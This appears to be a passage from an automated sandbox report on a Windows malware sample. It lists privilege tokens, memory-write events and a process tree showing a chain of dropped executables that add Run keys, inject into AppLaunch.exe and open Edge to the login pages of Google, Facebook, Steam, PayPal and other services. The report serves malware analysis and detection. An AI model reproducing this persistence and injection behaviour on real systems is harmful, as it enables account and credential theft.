Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeDebugPrivilege	4600	A10E.exe
Token: SeShutdownPrivilege	3304	Explorer.EXE
Token: SeCreatePagefilePrivilege	3304	Explorer.EXE
Token: SeShutdownPrivilege	3304	Explorer.EXE

Suspicious use of FindShellTrayWindow 35 IoCs

Processes:

1Nr74BH7.exemsedge.exe

pid	process
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe

Suspicious use of SendNotifyMessage 34 IoCs

Processes:

1Nr74BH7.exemsedge.exe

pid	process
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
2684	1Nr74BH7.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe
4252	msedge.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Broom.exe

pid process

2836 Broom.exe
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3304 Explorer.EXE

pid	process
2836	Broom.exe

pid	process
3304	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exeyV8Rq22.exeGJ6iM34.exeIW8qq02.exe1Nr74BH7.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exemsedge.exe2ne4059.exe

description	pid	process	target process
PID 716 wrote to memory of 4300	716	afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe	yV8Rq22.exe
PID 716 wrote to memory of 4300	716	afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe	yV8Rq22.exe
PID 716 wrote to memory of 4300	716	afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe	yV8Rq22.exe
PID 4300 wrote to memory of 112	4300	yV8Rq22.exe	GJ6iM34.exe
PID 4300 wrote to memory of 112	4300	yV8Rq22.exe	GJ6iM34.exe
PID 4300 wrote to memory of 112	4300	yV8Rq22.exe	GJ6iM34.exe
PID 112 wrote to memory of 2572	112	GJ6iM34.exe	IW8qq02.exe
PID 112 wrote to memory of 2572	112	GJ6iM34.exe	IW8qq02.exe
PID 112 wrote to memory of 2572	112	GJ6iM34.exe	IW8qq02.exe
PID 2572 wrote to memory of 2684	2572	IW8qq02.exe	1Nr74BH7.exe
PID 2572 wrote to memory of 2684	2572	IW8qq02.exe	1Nr74BH7.exe
PID 2572 wrote to memory of 2684	2572	IW8qq02.exe	1Nr74BH7.exe
PID 2684 wrote to memory of 4868	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 4868	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 1716	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 1716	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 2608	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 2608	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 2292	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 2292	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 1760	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 1760	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 2724	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 2724	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 1980	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 1980	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 4252	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 4252	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 2152	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 2152	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 3124	2684	1Nr74BH7.exe	msedge.exe
PID 2684 wrote to memory of 3124	2684	1Nr74BH7.exe	msedge.exe
PID 1716 wrote to memory of 4748	1716	msedge.exe	msedge.exe
PID 1716 wrote to memory of 4748	1716	msedge.exe	msedge.exe
PID 2608 wrote to memory of 3528	2608	msedge.exe	msedge.exe
PID 2608 wrote to memory of 3528	2608	msedge.exe	msedge.exe
PID 2724 wrote to memory of 2416	2724	msedge.exe	msedge.exe
PID 2724 wrote to memory of 2416	2724	msedge.exe	msedge.exe
PID 2292 wrote to memory of 412	2292	msedge.exe	msedge.exe
PID 2292 wrote to memory of 412	2292	msedge.exe	msedge.exe
PID 2152 wrote to memory of 2396	2152	msedge.exe	msedge.exe
PID 2152 wrote to memory of 2396	2152	msedge.exe	msedge.exe
PID 3124 wrote to memory of 4836	3124	msedge.exe	msedge.exe
PID 3124 wrote to memory of 4836	3124	msedge.exe	msedge.exe
PID 4868 wrote to memory of 3556	4868	msedge.exe	msedge.exe
PID 4868 wrote to memory of 3556	4868	msedge.exe	msedge.exe
PID 1980 wrote to memory of 888	1980	msedge.exe	msedge.exe
PID 1980 wrote to memory of 888	1980	msedge.exe	msedge.exe
PID 4252 wrote to memory of 4356	4252	msedge.exe	msedge.exe
PID 4252 wrote to memory of 4356	4252	msedge.exe	msedge.exe
PID 1760 wrote to memory of 3128	1760	msedge.exe	msedge.exe
PID 1760 wrote to memory of 3128	1760	msedge.exe	msedge.exe
PID 2572 wrote to memory of 4292	2572	IW8qq02.exe	2ne4059.exe
PID 2572 wrote to memory of 4292	2572	IW8qq02.exe	2ne4059.exe
PID 2572 wrote to memory of 4292	2572	IW8qq02.exe	2ne4059.exe
PID 4292 wrote to memory of 5020	4292	2ne4059.exe	AppLaunch.exe
PID 4292 wrote to memory of 5020	4292	2ne4059.exe	AppLaunch.exe
PID 4292 wrote to memory of 5020	4292	2ne4059.exe	AppLaunch.exe
PID 4292 wrote to memory of 4604	4292	2ne4059.exe	AppLaunch.exe
PID 4292 wrote to memory of 4604	4292	2ne4059.exe	AppLaunch.exe
PID 4292 wrote to memory of 4604	4292	2ne4059.exe	AppLaunch.exe
PID 4292 wrote to memory of 4604	4292	2ne4059.exe	AppLaunch.exe
PID 4292 wrote to memory of 4604	4292	2ne4059.exe	AppLaunch.exe
PID 4292 wrote to memory of 4604	4292	2ne4059.exe	AppLaunch.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3304

C:\Users\Admin\AppData\Local\Temp\afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe
"C:\Users\Admin\AppData\Local\Temp\afa1a1360224b51648fe7c1cb3233199f0c9c41605d0a7107dfc050ec4d6c733.exe"
2⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:716

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\yV8Rq22.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4300

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\GJ6iM34.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:112

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\IW8qq02.exe
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2572

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Nr74BH7.exe
6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
7⤵
- Suspicious use of WriteProcessMemory
PID:4868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7fff19a546f8,0x7fff19a54708,0x7fff19a54718
8⤵
PID:3556

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,5775811699455623502,1747400927720817095,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
8⤵
PID:892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,5775811699455623502,1747400927720817095,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
8⤵
PID:2340

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
7⤵
- Suspicious use of WriteProcessMemory
PID:1716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7fff19a546f8,0x7fff19a54708,0x7fff19a54718
8⤵
PID:4748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2084,14176050302445693064,16401822281101985679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
8⤵
PID:3404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2084,14176050302445693064,16401822281101985679,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
8⤵
PID:1376

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
7⤵
- Suspicious use of WriteProcessMemory
PID:2608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7fff19a546f8,0x7fff19a54708,0x7fff19a54718
8⤵
PID:3528

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,1849450190433448815,7912733660170861131,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
8⤵
PID:6156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,1849450190433448815,7912733660170861131,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2
8⤵
PID:6148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/
7⤵
- Suspicious use of WriteProcessMemory
PID:2292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7fff19a546f8,0x7fff19a54708,0x7fff19a54718
8⤵
PID:412

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,14891875909370650427,11550776987272805166,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
8⤵
PID:1704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,14891875909370650427,11550776987272805166,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
8⤵
PID:2824

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login
7⤵
- Suspicious use of WriteProcessMemory
PID:1760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7fff19a546f8,0x7fff19a54708,0x7fff19a54718
8⤵
PID:3128

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2188,10083457751346908845,18378899920541240382,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
8⤵
PID:1904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2188,10083457751346908845,18378899920541240382,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
8⤵
PID:2472

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/
7⤵
- Suspicious use of WriteProcessMemory
PID:2724

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7fff19a546f8,0x7fff19a54708,0x7fff19a54718
8⤵
PID:2416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,16690737918730568973,243603740102478286,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
8⤵
PID:2300

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,16690737918730568973,243603740102478286,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
8⤵
PID:4272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login
7⤵
- Suspicious use of WriteProcessMemory
PID:1980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7fff19a546f8,0x7fff19a54708,0x7fff19a54718
8⤵
PID:888

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,17170914568725766460,17721650969230725494,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
8⤵
PID:4292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,17170914568725766460,17721650969230725494,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
8⤵
PID:5660

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin
7⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7fff19a546f8,0x7fff19a54708,0x7fff19a54718
8⤵
PID:4356

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2272 /prefetch:3
8⤵
PID:6060

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2220 /prefetch:2
8⤵
PID:2664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2548 /prefetch:8
8⤵
PID:6580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
8⤵
PID:7080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2212,192931348306309600,12840103217446349091,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
8⤵
PID:7072

